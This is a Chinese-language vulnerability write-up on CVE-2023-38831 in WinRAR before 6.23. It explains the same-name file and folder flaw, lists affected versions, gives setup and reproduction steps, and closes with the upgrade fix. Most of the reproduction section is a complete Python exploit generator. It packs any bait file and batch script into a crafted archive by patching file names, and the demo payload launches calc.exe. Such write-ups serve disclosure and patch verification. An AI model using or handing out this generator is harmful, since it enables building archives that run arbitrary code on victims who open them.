CVE-2023-38831：WinRAR远程代码执行漏洞

jiangmingzi

E1gHt Timeline Sec 2023-09-25 18:30 发表于上海
0x01 简介

WinRAR是一款文件压缩器。该产品支持RAR、ZIP等格式文件的压缩和解压等。WinRAR 在处理压缩包内同名的文件与文件夹时代码执行漏洞，攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件，诱导受害者打开此文件后，将在受害者机器上执行任意代码。

0x02 漏洞概述

漏洞编号：CVE-2023-38831

WinRAR 是一款适用于 Windows 系统的压缩包管理器。WinRAR 6.2.3之前版本打开压缩文件时会调ShellExecute  函数匹配文件名，如果目标文件名与文件类型不匹配时则会执行目标文件中的批处理文件。攻击者可利用该漏洞构造恶意的压缩文件，其中包含具有恶意  payload 的文件和同名的文件夹，通过诱导用户打开压缩文件中的带有 payload 的恶意文件远程执行任意代码。

0x03 影响版本

RARLabs WinRAR< 6.23

0x04 环境搭建

安装存在漏洞的应用环境 http://www.winrar.com.cn/download-61164scp.html

0x05 漏洞复现

编写脚本：CVE-2023-38831.py

1. -*- coding: utf-8 -*-
   
2. import shutil
   
3. import os, sys
   
4. from os.path import join
   
5. TEMPLATE_NAME = "TEMPLATE"
   
6. OUTPUT_NAME = "CVE-2023-38831-poc.rar"
   
7. 
   
8. BAIT_NAME = "test.pdf"
   
9. SCRIPT_NAME = "script.bat"
   
10. 
    
11. if len(sys.argv) > 3:
    
12.     BAIT_NAME = os.path.basename(sys.argv[1])
    
13.     SCRIPT_NAME = os.path.basename(sys.argv[2])
    
14.     OUTPUT_NAME = os.path.basename(sys.argv[3])
    
15. elif len(sys.argv) == 2 and sys.argv[1] == "poc":
    
16.     pass
    
17. else:
    
18.     print("""Usage:
    
19.           python .\cve-2023-38831-exp-gen.py poc
    
20.           python .\cve-2023-38831-exp-gen.py <BAIT_NAME> <SCRIPT_NAME> <OUTPUT_NAME>""")
    
21.     sys.exit()
    
22. 
    
23. BAIT_EXT = b"." + bytes(BAIT_NAME.split(".")[-1], "utf-8")
    
24. 
    
25. print("BAIT_NAME:", BAIT_NAME)
    
26. print("SCRIPT_NAME:", SCRIPT_NAME)
    
27. print("OUTPUT_NAME:", OUTPUT_NAME)
    
28. 
    
29. if os.path.exists(TEMPLATE_NAME):
    
30.     shutil.rmtree(TEMPLATE_NAME)
    
31. os.mkdir(TEMPLATE_NAME)
    
32. d = join(TEMPLATE_NAME, BAIT_NAME + "A")
    
33. if not os.path.exists(d):
    
34.     os.mkdir(d)
    
35. 
    
36. shutil.copyfile(join(SCRIPT_NAME), join(d, BAIT_NAME+"A.cmd"))
    
37. shutil.copyfile(join(BAIT_NAME), join(TEMPLATE_NAME, BAIT_NAME+"B"))
    
38. 
    
39. # if os.path.exists(OUTPUT_NAME):
    
40. #     print("!!! dir %s exists, delete it first" %(OUTPUT_NAME))
    
41. #     sys.exit()
    
42. 
    
43. shutil.make_archive(TEMPLATE_NAME, 'zip', TEMPLATE_NAME)
    
44. 
    
45. with open(TEMPLATE_NAME + ".zip", "rb") as f:
    
46.     content = f.read()
    
47.     content = content.replace(BAIT_EXT + b"A", BAIT_EXT + b" ")
    
48.     content = content.replace(BAIT_EXT + b"B", BAIT_EXT + b" ")
    
49. 
    
50. os.remove(TEMPLATE_NAME + ".zip")
    
51. 
    
52. with open(OUTPUT_NAME, "wb")  as f:
    
53.     f.write(content)
    
54. 
    
55. print("ok..")

复制代码

script.bat内容如下

1. calc.exe

复制代码

test.pdf内容随意，放入同一个文件夹中

用以上脚本将script.bat和test.pdf打包成一个带漏洞的RAR：poc.rar

执行python脚本

1. python3 CVE-2023-38831.py test.pdf script.bat poc.rar

复制代码

用winrar打开poc.rar

成功执行命令

0x06 修复方式

更新WinRAR版本到6.23以上

参考链接

https://mp.weixin.qq.com/s/1Feg1PcSBwpg3Co9k_HzMA